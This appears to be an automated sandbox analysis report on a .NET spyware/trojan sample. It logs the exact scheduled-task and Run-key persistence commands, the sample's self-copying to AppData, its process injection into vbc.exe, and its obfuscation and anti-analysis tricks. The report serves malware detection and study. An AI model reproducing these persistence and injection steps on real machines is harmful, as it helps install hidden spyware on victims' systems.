                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghnJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /fJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\pdP5Rv9pPW.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /fJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghnJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /fJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fghn\fghn.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /fJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeFile created: C:\Users\user\AppData\Roaming\fghnJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@32/7@0/1
                  Source: pdP5Rv9pPW.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: pdP5Rv9pPW.exe, CreateHotPool.csBase64 encoded string: 'WZFhk50pW2OmZMWUOXwyMIduqTzJ60jPf2OsMwDeSGiC8LAV526YSKogU3aWvSie', 'YpFiMiC/kO9OcRkhNu6mC3n7Tdj750lKg7rA03kDpOM8A/lQE/Lv6Tfa6vefiTJj', 'xQcAAg+NYlRePvn9hmGJQ/DJSUj2NfX6+RI2T6hRX1Fk/a1ZdHvNqYYMEzl0Q5Fc', 'ibJCET1aVlN6DNm3K1QoK3YzyicPwpY8J2bt15NavCwqW2lcNLBBWFSShhKGsLx2', '+RakZT8HDwTrKIp7uBHT74ESxoVRAPoz4js3DLbj8FnHGWMpzo5n8JN8bI6wACVR'
                  Source: 0.0.pdP5Rv9pPW.exe.190000.0.unpack, CreateHotPool.csBase64 encoded string: 'WZFhk50pW2OmZMWUOXwyMIduqTzJ60jPf2OsMwDeSGiC8LAV526YSKogU3aWvSie', 'YpFiMiC/kO9OcRkhNu6mC3n7Tdj750lKg7rA03kDpOM8A/lQE/Lv6Tfa6vefiTJj', 'xQcAAg+NYlRePvn9hmGJQ/DJSUj2NfX6+RI2T6hRX1Fk/a1ZdHvNqYYMEzl0Q5Fc', 'ibJCET1aVlN6DNm3K1QoK3YzyicPwpY8J2bt15NavCwqW2lcNLBBWFSShhKGsLx2', '+RakZT8HDwTrKIp7uBHT74ESxoVRAPoz4js3DLbj8FnHGWMpzo5n8JN8bI6wACVR'
                  Source: fghn.exe.9.dr, CreateHotPool.csBase64 encoded string: 'WZFhk50pW2OmZMWUOXwyMIduqTzJ60jPf2OsMwDeSGiC8LAV526YSKogU3aWvSie', 'YpFiMiC/kO9OcRkhNu6mC3n7Tdj750lKg7rA03kDpOM8A/lQE/Lv6Tfa6vefiTJj', 'xQcAAg+NYlRePvn9hmGJQ/DJSUj2NfX6+RI2T6hRX1Fk/a1ZdHvNqYYMEzl0Q5Fc', 'ibJCET1aVlN6DNm3K1QoK3YzyicPwpY8J2bt15NavCwqW2lcNLBBWFSShhKGsLx2', '+RakZT8HDwTrKIp7uBHT74ESxoVRAPoz4js3DLbj8FnHGWMpzo5n8JN8bI6wACVR'
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5728:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3524:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2188:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4224:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4660:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:120:WilError_01
                  Source: 2.0.vbc.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 2.0.vbc.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: pdP5Rv9pPW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: pdP5Rv9pPW.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: vbc.pdb source: vbc.exe, 00000002.00000003.370543337.000000000A09D000.00000004.00000800.00020000.00000000.sdmp, excel.exe, 0000000C.00000000.391226032.0000000001261000.00000020.00000001.01000000.00000007.sdmp, excel.exe.2.dr

                  Data Obfuscation

Source: pdP5Rv9pPW.exe, 00000000.00000000.301051021.0000000000192000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: dotNetProtector
Source: pdP5Rv9pPW.exe, 00000000.00000000.301051021.0000000000192000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: 3H@rM_2BytesPerCharDirectorySeparatorCharRemoveMemberMagicNumber_haveReadFromReaderInternalFormatProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderSpecialFolderIEEERemainderBufferResourceManagerDebuggerCheckHelperModuleRefUserKeepDelimiterGet_CreatePdbSymbolWriterCreateSymWriterget_IsPointerBitConverterKeyValuePairGetTokenForFloorGet_PercentGroupSeparatorTextElementEnumerator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorCodePageDataPtrIntPtrM_iCAsAbsSystem.Diagnosticsgsadshdsget_PreservePropertyRidsFadsssfhcfggddsgsdfgfgggfggggggggilggEndsFadsssfhcfddgdgsgsdfgfgggfggggggggilggEndsGetMethodsadsdsAesSystemEnterpriseServicesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcespFljoFmnmndkleo.resourcesGetDirectoriesabbreviatedMonthNamesDayNamesSaShortTimesM_iEndLinesInlineeLinesGetExportedTypesCompareDeclaringTypesGregorianCalendarTypesMemberTypesStartOfUserTypesEmptyTypesGetCatchEndAddressesMethodAttributesSetFileAttributesTypeAttributesMethodImplAttributesGetCustomAttributesRfc2898DeriveBytesGetBytesfhfsGet_BindingFlagsGetMethodImplementationFlagsSetImplementationFlagsjfddggsshgsfhddsdshfddfhhsagshsSet_HasThisGet_MethodBodyChunksEqualsContainsCallingConventionsm_OptionsCreationOptionsCosGetCustomAttributePropsGetMemberRefPropsget_CharsGetMembersGetOptionalCustomModifiersGet_ExceptionHandlersReadExceptionHandlersRuntimeHelpersGetParametersGet_TotalHoursget_IsClassAssemblyBuilderAccessM_accessGetCurrentProcessSsucggsshhhdassdasgggggggggdddddddddddfccgdfsdefssSsucggsshhhdassdassssssssgggggggggdddddddddddfccgdfsdefssSsucggsshhdhgdddddddggggggggggggsddddfccggdfsdefssgfssGetGenericArgumentsExistsModulus l
Source: pdP5Rv9pPW.exe String found in binary or memory: dotNetProtector
Source: pdP5Rv9pPW.exe String found in binary or memory: 3H@rM_2BytesPerCharDirectorySeparatorCharRemoveMemberMagicNumber_haveReadFromReaderInternalFormatProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderSpecialFolderIEEERemainderBufferResourceManagerDebuggerCheckHelperModuleRefUserKeepDelimiterGet_CreatePdbSymbolWriterCreateSymWriterget_IsPointerBitConverterKeyValuePairGetTokenForFloorGet_PercentGroupSeparatorTextElementEnumerator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorCodePageDataPtrIntPtrM_iCAsAbsSystem.Diagnosticsgsadshdsget_PreservePropertyRidsFadsssfhcfggddsgsdfgfgggfggggggggilggEndsFadsssfhcfddgdgsgsdfgfgggfggggggggilggEndsGetMethodsadsdsAesSystemEnterpriseServicesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcespFljoFmnmndkleo.resourcesGetDirectoriesabbreviatedMonthNamesDayNamesSaShortTimesM_iEndLinesInlineeLinesGetExportedTypesCompareDeclaringTypesGregorianCalendarTypesMemberTypesStartOfUserTypesEmptyTypesGetCatchEndAddressesMethodAttributesSetFileAttributesTypeAttributesMethodImplAttributesGetCustomAttributesRfc2898DeriveBytesGetBytesfhfsGet_BindingFlagsGetMethodImplementationFlagsSetImplementationFlagsjfddggsshgsfhddsdshfddfhhsagshsSet_HasThisGet_MethodBodyChunksEqualsContainsCallingConventionsm_OptionsCreationOptionsCosGetCustomAttributePropsGetMemberRefPropsget_CharsGetMembersGetOptionalCustomModifiersGet_ExceptionHandlersReadExceptionHandlersRuntimeHelpersGetParametersGet_TotalHoursget_IsClassAssemblyBuilderAccessM_accessGetCurrentProcessSsucggsshhhdassdasgggggggggdddddddddddfccgdfsdefssSsucggsshhhdassdassssssssgggggggggdddddddddddfccgdfsdefssSsucggsshhdhgdddddddggggggggggggsddddfccggdfsdefssgfssGetGenericArgumentsExistsModulus l
Source: fghn.exe.9.dr String found in binary or memory: dotNetProtector
Source: fghn.exe.9.dr String found in binary or memory: 3H@rM_2BytesPerCharDirectorySeparatorCharRemoveMemberMagicNumber_haveReadFromReaderInternalFormatProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderSpecialFolderIEEERemainderBufferResourceManagerDebuggerCheckHelperModuleRefUserKeepDelimiterGet_CreatePdbSymbolWriterCreateSymWriterget_IsPointerBitConverterKeyValuePairGetTokenForFloorGet_PercentGroupSeparatorTextElementEnumerator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorCodePageDataPtrIntPtrM_iCAsAbsSystem.Diagnosticsgsadshdsget_PreservePropertyRidsFadsssfhcfggddsgsdfgfgggfggggggggilggEndsFadsssfhcfddgdgsgsdfgfgggfggggggggilggEndsGetMethodsadsdsAesSystemEnterpriseServicesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcespFljoFmnmndkleo.resourcesGetDirectoriesabbreviatedMonthNamesDayNamesSaShortTimesM_iEndLinesInlineeLinesGetExportedTypesCompareDeclaringTypesGregorianCalendarTypesMemberTypesStartOfUserTypesEmptyTypesGetCatchEndAddressesMethodAttributesSetFileAttributesTypeAttributesMethodImplAttributesGetCustomAttributesRfc2898DeriveBytesGetBytesfhfsGet_BindingFlagsGetMethodImplementationFlagsSetImplementationFlagsjfddggsshgsfhddsdshfddfhhsagshsSet_HasThisGet_MethodBodyChunksEqualsContainsCallingConventionsm_OptionsCreationOptionsCosGetCustomAttributePropsGetMemberRefPropsget_CharsGetMembersGetOptionalCustomModifiersGet_ExceptionHandlersReadExceptionHandlersRuntimeHelpersGetParametersGet_TotalHoursget_IsClassAssemblyBuilderAccessM_accessGetCurrentProcessSsucggsshhhdassdasgggggggggdddddddddddfccgdfsdefssSsucggsshhhdassdassssssssgggggggggdddddddddddfccgdfsdefssSsucggsshhdhgdddddddggggggggggggsddddfccggdfsdefssgfssGetGenericArgumentsExistsModulus l
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe Code function: 0_2_04EB5CF0 push ebx; retf 0_2_04EBA826
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe Code function: 0_2_04EB4C5D push esp; ret 0_2_04EB4C5E
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe Code function: 0_2_04EB4D2D push cs; retf 0_2_04EB4D4A
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe Code function: 0_2_04ECA4FE push edx; retf 0040h 0_2_04ECA57E
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe Code function: 0_2_04ECA9DE pushad ; ret 0_2_04ECAA1D
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe Code function: 0_2_04EC0E89 push ebp; ret 0_2_04EC0E8C
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe Code function: 0_2_04EDBC8F pushfd ; ret 0_2_04EDBC8E
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe Code function: 0_2_04EDB896 push ds; iretd 0_2_04EDB9AA
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe Code function: 0_2_04EDBC5E pushfd ; ret 0_2_04EDBC8E
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe Code function: 0_2_04EDB829 push ds; iretd 0_2_04EDB9AA
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe Code function: 0_2_04EDB813 push ds; iretd 0_2_04EDB9AA
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe Code function: 0_2_04F00EC0 push ds; ret 0_2_04F00EC3
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe Code function: 0_2_04F00287 push edi; iretd 0_2_04F0028A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 2_2_09EE8860 push 8C09138Ch; retf 04F7h 2_2_09EE9C3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 2_2_09EE9800 push 8C09138Ch; retf 04F7h 2_2_09EE9C3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 2_2_0A27122D push esp; iretd 2_2_0A27122E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 2_2_0A271397 pushad ; iretd 2_2_0A271398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 2_2_0A2713EA push esp; iretd 2_2_0A2713EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 2_2_0A27102B push esp; iretd 2_2_0A27102C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 2_2_0A272520 push edi; ret 2_2_0A272526
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 2_2_0A272177 push edi; retn 0000h 2_2_0A272179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 2_2_0A2715E5 pushfd ; iretd 2_2_0A2715E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 2_2_0A2725DD push E904F7D0h; retn 0006h 2_2_0A2725E2
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\fghn\fghn.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File created: C:\Users\user\AppData\Roaming\excel\excel.exe

                  Boot Survival

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run excel

                  Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Users\user\AppData\Roaming\excel\excel.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe TID: 5840 | Thread sleep count: 41 > 30
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe TID: 5840 | Thread sleep time: -41000s >= -30000s
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe TID: 5748 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5232 | Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5932 | Thread sleep count: 9658 > 30
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe TID: 2620 | Thread sleep count: 44 > 30
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe TID: 2620 | Thread sleep time: -44000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe TID: 5828 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 1680 | Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5704 | Thread sleep count: 9690 > 30
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Window / User API: threadDelayed 9658
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Window / User API: threadDelayed 9690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Thread delayed: delay time: 922337203685477
                  Source: vbc.exe, 00000002.00000003.391294158.0000000009F3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.394371318.0000000009F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.593748188.000000000A5E2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Process queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 2_2_0A3F3AC0 LdrInitializeThunk, 2_2_0A3F3AC0
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\AppData\Roaming\excel\excel.exe | Injected file: C:\Users\user\AppData\Roaming\excel\excel.exe was created by C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 436000
